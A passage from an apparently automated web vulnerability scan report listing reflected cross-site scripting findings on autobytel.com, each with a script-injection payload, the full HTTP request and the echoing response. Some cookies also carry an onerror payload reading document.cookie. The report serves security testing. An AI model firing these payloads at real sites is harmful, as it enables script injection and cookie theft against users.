Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:26 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:56:26 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-advice.htm?3e5d6"><script>alert(1)</script>5ac1d95ea8c=1">
...[SNIP]...

4.480. http://www.autobytel.com/car-dealers.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-dealers.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59628"><script>alert(1)</script>c17b73d46b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-dealers.htm?59628"><script>alert(1)</script>c17b73d46b0=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:04:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:04:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:04:26 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:04:26 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38874


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-dealers.htm?59628"><script>alert(1)</script>c17b73d46b0=1">
...[SNIP]...

4.481. http://www.autobytel.com/car-financing.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-financing.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a1ba"><script>alert(1)</script>72bb89c822 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-financing.htm?9a1ba"><script>alert(1)</script>72bb89c822=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41471


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-financing.htm?9a1ba"><script>alert(1)</script>72bb89c822=1">
...[SNIP]...

4.482. http://www.autobytel.com/car-incentives.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-incentives.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a66"><script>alert(1)</script>d49e48ec7f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-incentives.htm?62a66"><script>alert(1)</script>d49e48ec7f0=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:50:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:50:40 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:50:40 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33949


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-incentives.htm?62a66"><script>alert(1)</script>d49e48ec7f0=1">
...[SNIP]...

4.483. http://www.autobytel.com/car-news.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-news.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce21d"><script>alert(1)</script>3aec2d5e3b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-news.htm?ce21d"><script>alert(1)</script>3aec2d5e3b1=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:59:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:59:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:59:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:59:54 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 40907


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-news.htm?ce21d"><script>alert(1)</script>3aec2d5e3b1=1">
...[SNIP]...

4.484. http://www.autobytel.com/car-pictures.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-pictures.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31c5"><script>alert(1)</script>0161e7b6f7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-pictures.htm?d31c5"><script>alert(1)</script>0161e7b6f7e=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43571
Expires: Mon, 24 Jan 2011 23:57:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:09 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:09 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-pictures.htm?d31c5"><script>alert(1)</script>0161e7b6f7e=1">
...[SNIP]...

4.485. http://www.autobytel.com/car-reviews.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-reviews.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85055"><script>alert(1)</script>0f5db676ef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-reviews.htm?85055"><script>alert(1)</script>0f5db676ef2=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:39 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49248


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-reviews.htm?85055"><script>alert(1)</script>0f5db676ef2=1">
...[SNIP]...

4.486. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/finance/index.cfm/action/Calculator

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9428c"><script>alert(1)</script>80066caf137 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/buy/finance/index.cfm/action/Calculator?9428c"><script>alert(1)</script>80066caf137=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:05 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 35888


<!-- begin: index.cfm -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator?9428c"><script>alert(1)</script>80066caf137=1">
...[SNIP]...

4.487. http://www.autobytel.com/content/buy/warranty/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/warranty/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972de"><script>alert(1)</script>4370f7100ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/buy/warranty/index.cfm?972de"><script>alert(1)</script>4370f7100ff=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:35:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:35:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:35:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:35:25 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39531


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/buy/warranty/index.cfm?972de"><script>alert(1)</script>4370f7100ff=1">
...[SNIP]...

4.488. http://www.autobytel.com/content/home/help/index.cfm [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ac1"><script>alert(1)</script>8ce2ae86fd0 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm?id=13148;ABTLe6ac1"><script>alert(1)</script>8ce2ae86fd0&action=privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:39:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:39:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:39:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:39:20 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55374


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm?id=13148;ABTLe6ac1"><script>alert(1)</script>8ce2ae86fd0&action=privacy">
...[SNIP]...

4.489. http://www.autobytel.com/content/home/help/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85633"><script>alert(1)</script>76dec51da84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm?85633"><script>alert(1)</script>76dec51da84=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:43:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:43:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:43:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:43:35 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45285


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm?85633"><script>alert(1)</script>76dec51da84=1">
...[SNIP]...

4.490. http://www.autobytel.com/content/home/help/index.cfm/action/about [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/about

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a165"><script>alert(1)</script>04f69bcc06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm/action/about?1a165"><script>alert(1)</script>04f69bcc06f=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:36 GMT
Content-Length: 32367
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:36 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:36 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
